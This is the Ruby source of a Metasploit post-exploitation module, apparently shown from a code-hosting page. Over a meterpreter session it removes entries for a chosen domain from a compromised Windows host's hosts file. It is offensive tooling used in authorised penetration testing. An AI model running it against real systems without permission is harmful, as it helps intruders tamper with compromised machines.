metasploit-framework/modules/post/windows/manage/remove_host.rb

61 lines
1.5 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Post
2013-08-30 21:28:54 +00:00
def initialize(info={})
super( update_info( info,
'Name' => 'Windows Manage Host File Entry Removal',
'Description' => %q{
This module allows the attacker to remove an entry from the Windows hosts file.
},
'License' => BSD_LICENSE,
'Author' => [ 'vt <nick.freeman[at]security-assessment.com>'],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ]
))
register_options(
[
OptString.new('DOMAIN', [ true, 'Domain name to remove from the hosts file.' ])
], self.class)
end
def run
hosttoremove = datastore['DOMAIN']
# remove hostname from hosts file
fd = client.fs.file.new("C:\\WINDOWS\\System32\\drivers\\etc\\hosts", "r+b")
# Get a temporary file path
meterp_temp = Tempfile.new('meterp')
meterp_temp.binmode
temp_path = meterp_temp.path
print_status("Removing hosts file entry pointing to #{hosttoremove}")
newfile = ''
fdray = fd.read.split("\r\n")
fdray.each do |line|
if line.match("\t#{hosttoremove}$")
else
newfile += "#{line}\r\n"
end
end
fd.close
meterp_temp.write(newfile)
meterp_temp.close
client.fs.file.upload_file('C:\\WINDOWS\\System32\\drivers\\etc\\hosts', meterp_temp)
print_good("Done!")
end
end